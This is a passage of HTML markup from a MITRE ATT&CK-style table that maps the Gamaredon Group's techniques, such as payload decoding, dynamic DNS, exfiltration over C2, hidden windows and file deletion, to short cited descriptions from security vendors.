href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1140</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Deobfuscate/Decode Files or Information</span></a></p></td><td style="border-left:solid #dfdfdf 
0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools decrypted additional payloads from the C2. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also decoded base64-encoded source code of a downloader.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: 
Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1568"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1568</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1568"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 
vertical-align: baseline;">Dynamic Resolution</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has incorporated dynamic DNS domains in its infrastructure.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 
0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1041</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Exfiltration Over C2 Channel</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can transfer collected files to a hardcoded C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1083</span></a></p></td><td 
style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. 
</span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid 
#dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1564</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.003</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hide Artifacts</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hidden Window</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">hidcon</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to run batch files in a hidden console window.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); 
background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1562</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td 
style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Impair Defenses</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1562/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Disable or Modify Tools</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;"> has delivered macros which can tamper with Microsoft Office security settings.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1070</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a 
href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.004</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Indicator Removal</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File Deletion</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools can delete files used during an operation.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; 
font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1105</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon 
